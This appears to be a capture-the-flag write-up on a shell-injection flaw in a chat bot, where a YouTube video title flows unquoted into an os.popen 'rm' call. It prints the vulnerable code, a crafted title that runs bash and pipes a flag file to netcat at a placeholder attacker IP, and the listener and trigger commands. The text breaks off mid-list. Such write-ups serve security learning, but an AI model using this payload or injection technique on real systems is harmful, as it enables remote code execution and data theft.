🛠️ Challenge Recap

• Key code‑path The !mp4 <url> command downloads a YouTube video, then executes

  os.popen(f'rm ./mp4/{title}.mp4'), where title comes straight from the video’s title → unsanitised shell injection.

1 · Recon & Vulnerability

titlename = str(video.title)
os.popen(f'rm ./mp4/{titlename}.mp4')       #  <-- vulnerable

• os.popen spawns /bin/sh -c <string>.
• No quoting → any shell metacharacter in titlename is executed.
• The bot runs as root inside the container, so we get root‑level RCE.

2 · Crafting the Payload

1. Create a YouTube video ≤ 60 s (the bot refuses longer clips).

2. Rename the video title to embed a one‑liner that exfiltrates the flag.

   any_title; bash -c 'cat /app/flag.txt | nc <ATTACKER_IP> 4444'; #
   

   • ; terminates the first argument to rm.
   • bash -c '…' runs our command.
   • nc (netcat) sends the flag to our listener.
   • # comments‑out the trailing “.mp4” that the bot appends.

3. Start a listener on your machine:

   nc -lvnp 4444
   

3 · Triggering the Exploit

Inside any channel where the bot is present, send:

!mp4 <url‑of‑malicious‑video>

What happens

1. The bot downloads and sends the real video → no suspicion.